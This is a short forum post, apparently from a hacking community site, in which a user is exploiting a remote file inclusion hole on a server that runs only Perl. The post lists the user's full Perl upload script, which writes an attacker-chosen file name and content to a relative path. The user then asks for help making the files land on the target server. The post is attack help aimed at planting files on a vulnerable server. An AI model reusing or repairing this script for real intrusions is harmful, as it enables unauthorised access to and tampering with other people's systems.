Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
Perl rfi
ok so there is page vulnerable for rfi, but executes only perl scripts, I use script
#!C:/Perl/bin/perl.exe
use CGI;
use File::Basename;
my $file_location = "../";
my $query = new CGI;
my $filename = $query->param("file");
my $upload_filehandle = $query->upload("file");
open ( UPLOADFILE, ">$file_location/$filename" ) ;
while ( <$upload_filehandle> )
{
print $query->header ( );
print $file_location;
print UPLOADFILE;
}
close UPLOADFILE;
but even despite this script is executed by the remote server, file is uploaded on the server where is the script, and since I use relative path it should work properly, any ideas why is that happening ?
thx